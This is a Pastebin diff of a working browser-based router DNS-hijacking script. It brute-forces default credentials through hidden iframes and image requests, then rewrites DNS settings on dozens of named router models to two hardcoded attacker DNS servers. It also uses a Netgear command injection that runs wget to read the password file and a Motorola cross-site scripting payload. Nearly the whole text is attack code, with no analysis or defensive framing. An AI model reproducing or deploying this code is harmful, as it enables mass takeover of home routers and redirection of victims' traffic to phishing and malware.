API tools faq
paste
View difference between Paste ID: RX73Vs89 and WZzgXeRu
SHOW: | | - or go back to the newest paste.
1
var pDNS = "200.98.30.219";
2
var sDNS = "155.133.82.21";
3
var passlist=["pass","root","admin","123456789","123456","password","","<eopl>"];
4
var gstp=400;
5
var pstp=5000;
6
function exp(url, data, method){
7
    if(method=="GET"){
8
    document.write('<style type="text/css">@import url('+url+'&ju='+ Math.random()+');</style>');
9
    if(url.indexOf('<eopl>')>0){var tm=setTimeout(function(){window.stop();},gstp);}
10
    }
11
    else{
12
        document.write("<body></body>");
13
        var ifrm = document.createElement("IFRAME");
14
        ifrm.height="1px";
15
        ifrm.width="1px";
16
        document.body.appendChild(ifrm);
17
18
        var f=ifrm.contentWindow.document.createElement("FORM");
19
        f.name='f';
20
        f.method=method;
21
        f.action=url;
22
        var el=data.split('&');
23
        for(i=0;i<el.length;i++)
24
        {
25
            var e=el[i].split('=');
26
            var t=ifrm.contentWindow.document.createElement('INPUT');
27
            t.type='TEXT';
28
            t.id=e[0];
29
            t.name=e[0];
30
            t.value=e[1];
31
            f.appendChild(t);
32
        }
33
        ifrm.contentWindow.document.body.appendChild(f);
34
        f.submit();
35
        var tm=setTimeout(function(){window.stop();},pstp);
36
    }
37
}
38
function srq(ip) {
39
    for(i=0;i<12;i++){
40
41
    var url1 = "http://$1$"+ip+"/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&hostName=TL-WR941ND&Save=Save";
42
    var method = "GET";
43
    url = url1.replace("$1$","");
44
    var cred="admin";
45
    if(passlist[i]!="")
46
        cred=cred+":"+passlist[i];
47
    cred = cred+"@";
48
    url = url1.replace("$1$",cred);
49
    exp(url, "", method);
50
    }
51
52
}
53
function e_belkin(ip)
54
{
55
    var method = "POST";
56
    var url = "";
57
    var data ="";
58
59
    url="http://"+ip+"/cgi-bin/login.exe?pws=admin";
60
    exp(url, "", "GET");
61
62
    url="http://"+ip+"/cgi-bin/setup_dns.exe";
63
    data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"&dns2_1_t="+sDNS.split('.')[0]+"&dns2_2_t="+sDNS.split('.')[1]+"dns2_3_t="+sDNS.split('.')[2]+"&dns2_4_t="+sDNS.split('.')[3]+"&auto_from_isp=0";
64
    exp(url, data, method);
65
}
66
67
function e_webcam(ip)

68
{

69
}

70
71
function p_exp(ip) { 

72
    e_belkin(ip);

73
    e_webcam(ip);

74
    

75
    var method = "POST";

76
    var url = "";

77
    var data ="";

78
    

79
    url = "http://admin:admin@"+ip+"/apply.cgi";

80
    data="submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcplan_ip_addr=192.168.1.1&lan_dhcp_start=192.168.1.100&lan_dhcp_end=192.168.1.149&lan_dns0="+pDNS+"&lan_dns1="+sDNS+"&lan_netmask=255.255.255.0&machine_name=Cisco01723&lan_proto=dhcp&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&lan_dns0_0=217&lan_dns0_1=12&lan_dns0_2=208&lan_dns0_3=38&lan_dns1_0=8&lan_dns1_1=8&lan_dns1_2=8&lan_dns1_3=8";

81
    exp(url, data, method);

82
    

83
    url="http://admin:admin@"+ip+"/apply.cgi?/BAS_update.htm";

84
    data="submit_flag=ether&ether_dnsaddr1="+pDNS+"&ether_dnsaddr2="+sDNS+"&ether_dnsaddr3=8.8.8.8&Apply=Apply";

85
    exp(url, data, method);

86
    

87
    url="http://"+ip+"/goform/AdvSetDns";

88
    data="GO=wan_dns.asp&rebootflag=&DESN=1&DNSEN=on&DS1="+pDNS+"&DS2="+sDNS;

89
    exp(url, data, method); /*Unicorn WB-3300NR*/

90
    

91
    url="http://"+ip+"/login.cgi";

92
    data="login_name=admin&login_pass=";

93
    exp(url, data, method);

94
    

95
    url="http://"+ip+"/h_wan_fix.cgi";

96
    data="static_dns1="+pDNS+"&static_dns2="+sDNS;

97
    exp(url, data, method);

98
    

99
}

100
101
function e_moto(ip)

102
{

103
    /*var method = "GET";

104
    var url ="http://" + ip + "/frames.asp?userId=admin&password=motorola";

105
    exp(url, "", method);   

106
    

107
    url ='http://' + ip + 'Gateway.Wan.hostName=&Gateway.Wan.dhcpClientEnabled=0&Gateway.Wan.ipAddress=0.0.0.0&Gateway.Wan.subnetMask=0.0.0.0&Gateway.Wan.defaultGateway=0.0.0.0&Gateway.Wan.dnsAddress1=3.3.3.3&Gateway.Wan.dnsAddress2=2.2.2.2&Gateway.Wan.dnsAddress3=0.0.0.0&Gateway.Wan.tcpSessionWaitTimeout=300&Gateway.Wan.udpSessionWaitTimeout=300&Gateway.Wan.icmpSessionWaitTimeout=300&urlOk=gateway%2FgatewayWAN.asp&urlError=gateway%2FgatewayWAN.asp%3FsessionId%3D2144%26error%3Derror&BUTTON_INPUT=Apply';

108
    exp(url, "", POST); */

109
    var i1 = document.createElement('IMG');

110
    document.body.appendChild(i1);

111
    var i2 = document.createElement('IMG');

112
    document.body.appendChild(i2);

113
    i1.src='http://'+ip+'/frames.asp?userId=admin&password=motorola';

114
    i2.src='http://'+ip+'/goformFOO/AlFrame?Gateway.VirtualServerAdvConfig.add=Add&Gateway.VirtualServerAdvConfig.serverId.entry="%27%2B(window.onload%3Dfunction(){with(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dhcpClientEnabled=0%27%3Bz=%27%27%3Bfor(c in {%27Gateway.Wan.ipAddress%27:0,%27Gateway.Wan.subnetMask%27:0,%27Gateway.Wan.defaultGateway%27:0})z%2B=c%2B%27=%27%2Bdocument.getElementById(c).value%2B%27%26%27%3Bwith(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dnsAddress1='+pDNS+'%26%27%2Bz%2B%27%26Gateway.Wan.dhcpClientEnabled=0%27})%2B%27';

115
    

116
}/*Motorola*/

117
118
function r_exp(ip) {

119
    

120
    var method = "GET";

121
    var url ="";//http://admin:admin@"+ip+"?ju="+ Math.random();

122
    //exp(url, "", method);

123
    

124
    url="http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=WW=`wget 'http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1&curpath=/&currentsetting.htm=1' -O-` & wget --post-data='h_DNStype=Fixed&c4_DNS1address="+pDNS+"&c4_DNS2address="+sDNS+"&runtest=&todo=save&this_file=pppoe.htm&next_file=basic.htm' -O- 'http://$WW@"+ip+"/setup.cgi'&curpath=/&currentsetting.htm=1"; 

125
    exp(url, "", method); /*DGN 1000/DGN2200*/

126
    

127
    url="http://admin:admin@"+ip+"/start_apply.htm?current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&wan_unit=0&wan_enable=1&wan_nat_x=1&wan_dnsenable_x=0"; 

128
    exp(url, "", method); /*asus rt n66u*/

129
    

130
    url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1="+pDNS+"&wan_dns2="+sDNS+"&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&productid=RT-N56U&current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_proto=dhcp&wan_enable=1&wan_nat_x=1&wan_upnp_enable=1&wan_dhcpenable_x=1&wan_dnsenable_x=0&dhcpc_mode=1";

131
    exp(url, "", method); /*asus rt n56u*/

132
    

133
    url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS;

134
    exp(url, "", method); /*asus rt n56u*/

135
    

136
    url="http://"+ip+"/start_apply.htm?current_page=tcpipwan.asp&ipMode=pptp&typeForm=formWanTcpipSetup&submit-url=%2Ftcpipwan.asp&action_mode=Restart_WAN&flag=nodetect&preferred_lang=EN&wanType=autoIp&fixedIpMtuSize=1500&dnsMode=dnsManual&dns1="+pDNS+"&dns2="+sDNS;

137
    exp(url, "", method);/*asus nt-12*/

138
    

139
    url = "http://admin:admin@"+ip+"/setup.cgi?todo=wan_dns1="+pDNS+"";

140
    exp(url, "", method);

141
    

142
    url = "http://admin:admin@"+ip+"/setup_dns.stm?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";

143
    exp(url, "", method);

144
    

145
    url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";

146
    exp(url, "", method); /*Philips*/

147
    

148
    url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";

149
    exp(url, "", method);/*Motorola SBG901*/

150
     

151
    url ="http://"+ip+"/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP"

152
    exp(url, "", method);

153
    

154
    url ="http://"+ip+"/apply.cgi?wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS;

155
    exp(url, "", method);

156
    

157
    url ="http://admin@"+ip+"/apply.cgi?wan_specify_dns=1&dhcpc_use_ucast=1&classless_static_route=0&asp_temp_51=&asp_temp_52=dhcpc&reboot_type=wan&button=Save+Settings&wan_proto=dhcpc&opendns_enable=0&dns_relay=1&hostname=DIR-615&dhcpc_use_ucast_sel=1&wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS+"&wan_mtu=1500";

158
    exp(url, "", method);

159
    

160
    url ="http://"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";

161
    exp(url, "", method);

162
    

163
    url ="http://admin:password@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";

164
    exp(url, "", method);

165
    

166
    url ="http://Admin:1234@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";

167
    exp(url, "", method);

168
    

169
    url ="http://user:user@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";

170
    exp(url, "", method);

171
    

172
    url ="http://admin:admin@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";

173
    exp(url, "", method);

174
    

175
    url ="http://"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";

176
    exp(url, "", method);

177
    

178
    url = "http://admin:admin@"+ip+"/router/add_dhcp_segment.cgi?dhcp_on_chk=0&dhcp_server_on=1&dhcp_start_ip1="+ip+"&dhcp_end_ip1="+ip+"54&dhcp_start_ip2=&dhcp_end_ip2=&dhcp_start_ip3=&dhcp_end_ip3=&lan_as_gw_chk=0&is_lan_as_gw=1&custom_gw=&lease_time=86400&is_router_as_dns=1&dns1="+pDNS+"&dns2="+sDNS+"&dns3=&auto_bind=1&submitbutton=+%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88+";

179
    exp(url, "", method);

180
    

181
    url = "http://user:user@"+ip+"/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1="+ip+"&ip2="+ip+"&Lease=120&gateway=0.0.0.0&domain=&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=%B1%A3+%B4%E6";

182
    exp(url, "", method);

183
    

184
    url = "http://admin:admin@"+ip+"/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip="+ip+"&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0="+pDNS.split('.')[0]+"&dns0_1="+pDNS.split('.')[1]+"&dns0_2="+pDNS.split('.')[2]+"&dns0_3="+pDNS.split('.')[3]+"&dns1_0="+sDNS.split('.')[0]+"&dns1_1="+sDNS.split('.')[1]+"&dns1_2="+sDNS.split('.')[2]+"&dns1_3="+sDNS.split('.')[3]+"&dns2_0=8&dns2_1=8&dns2_2=8&dns2_3=8&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en";

185
    exp(url, "", method);

186
    

187
    url ="http://admin:admin@"+ip+"/userRpm/WanStaticIpCfgRpm.htm@wan=0&wantype=1&ip=0.0.0.0&mask=0.0.0.0&gateway=0.0.0.0&mtu=1500&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=Save";

188
    exp(url, "", method);

189
    

190
    url ="http://"+ip+"/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced";

191
    exp(url, "", method);

192
    

193
    url ="http://admin:password@"+ip+"/start_apply.htm?dnsserver="+pDNS+"&dnsserver2="+sDNS+""; 

194
    exp(url, "", method);

195
    

196
    url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&uiViewNetMask=255.255.255.0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP="+ip+"00&sysPoolCount=100&dhcp_LeaseTime=259200&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+pDNS+"";

197
    exp(url, "", method);

198
    

199
    url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS;

200
    exp(url, "", method);

201
    

202
    url = "http://root:root@"+ip+"/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS

203
    exp(url, "", method);

204
    

205
    url = "http://admin:admin@"+ip+"/prim.htm?i00110004="+pDNS+"&i00110005="+sDNS+"&i00035007="+pDNS+"&i00035008="+sDNS+"&i00040700="+pDNS+"&i00040800="+sDNS+"&i001e0008="+pDNS+"&i001e0009="+sDNS+"&_sce=%25ssc";

206
    exp(url, "", method); /*DI 604*/

207
    

208
    

209
    var t=setTimeout(function(){p_exp(ip);},1000);

210
    srq(ip);

211
    e_moto(ip);

212
}

213
var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome');

214
//if(document.referrer=="" || is_chrome<0){window.location.replace("about:blank")};

215
216
runweb(function(ip) {

217
    //if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)) {

218
        //var gw = ["192.168.1.1","192.168.15.1", "192.168.0.1", "192.168.0.227", "10.1.1.1", "10.0.0.1", "192.168.2.1", "192.168.1.2", "192.168.2.2", "192.168.1.254"];

219
        var sip = ip.split(".");

220
221
        ip = sip[0] + "." + sip[1] + "." + sip[2] + ".1";

222
        //var i = 0;

223
        //var j = 0;

224
        //for (i = 0; i < gw.length; i++) {

225
        //    if (ip == gw[i]) {

226
        //        j = j + 1;

227
        //        break;

228
        //    }

229
        //};

230
        //i = i + 1;

231
        //if (j > 0) {

232
            r_exp(ip);

233
        //};

234
    //}

235
});
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!